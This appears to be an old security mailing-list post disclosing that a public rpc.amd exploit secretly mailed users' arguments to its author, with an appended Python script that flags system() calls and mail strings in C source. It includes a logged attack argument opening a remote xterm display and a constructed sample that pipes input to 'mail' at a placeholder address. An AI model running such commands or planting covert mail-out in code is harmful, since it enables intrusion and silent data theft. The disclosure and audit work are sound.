Hello,

Sorry if this was already known.

Recently someone named Taeho Oh published an exploit for a buffer overflow in rpc.amd (automount). While testing this exploit on my own server, I saw that I was opening a connection to ohhara.postech.ac.kr on port 25. After a little research I found out that the exploit (in its original form) was sending an email to [EMAIL PROTECTED] and listing the arguments I just entered.

There is an easy way to stop it from sending. Just comment the line:

system(cmd);

Here's the log as I got it from sniffit:

EHLO BlackMesa.com
MAIL From:<[EMAIL PROTECTED]> SIZE=95
RCPT To:<[EMAIL PROTECTED]>
DATA
Received: (from root@localhost) by BlackMesa.com (8.9.3/8.9.3) id FAA01208 for [EMAIL PROTECTED]; Sat, 4 Sep 1999 05:30:56 +0200
Date: Sat, 4 Sep 1999 05:30:56 +0200
From: locke <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]

10.0.0.9 /usr/X11R6/bin/xterm -display 10.0.0.8:0
.
QUIT
QUIT

(IPs changed to protect the innocent)

Bye
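
Added example, not part of the original post and not the exploit's code: one way to check downloaded C source for command-spawning calls such as the `system(cmd);` line mentioned above, and for mail-related string literals, before compiling it. The sample source and the address in it are constructed, and the regex-based comment stripping does not understand `//` or `/*` inside string literals.

```python
import re

# C library calls that run an external command.
SPAWN_CALLS = re.compile(r'\b(system|popen|execl|execlp|execle|execv|execvp|execve)\s*\(')
# String literals that name a mailer or contain an e-mail address.
MAIL_HINT = re.compile(r'"[^"\n]*(\bsendmail\b|\bmailx?\b|[\w.+-]+@[\w-]+(\.[\w-]+)+)[^"\n]*"')

def strip_comments(text):
    """Drop /* */ and // comments, keeping newlines so line numbers still match."""
    text = re.sub(r'/\*.*?\*/', lambda m: "\n" * m.group(0).count("\n"), text, flags=re.S)
    return re.sub(r'//[^\n]*', '', text)

def audit_c_source(text):
    """Return {'spawn': [...], 'mail': [...]} as lists of (line_number, line)."""
    hits = {"spawn": [], "mail": []}
    for number, line in enumerate(strip_comments(text).splitlines(), start=1):
        if SPAWN_CALLS.search(line):
            hits["spawn"].append((number, line.strip()))
        if MAIL_HINT.search(line):
            hits["mail"].append((number, line.strip()))
    return hits

# Constructed sample, NOT the published exploit: a program that mails its
# argument to a placeholder address, mirroring the behaviour reported above.
SAMPLE = r'''
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char **argv) {
    char cmd[256];
    snprintf(cmd, sizeof cmd, "echo %s | mail collector@example.invalid", argv[1]);
    system(cmd);
    return 0;
}
'''

if __name__ == "__main__":
    for kind, found in audit_c_source(SAMPLE).items():
        for number, line in found:
            print(f"{kind:5} line {number}: {line}")
```

A hit is a line to read by hand, not a verdict; once the call is commented out, the `spawn` list for that file comes back empty while the `mail` hit on the command string remains as a reminder of what the code was built to do.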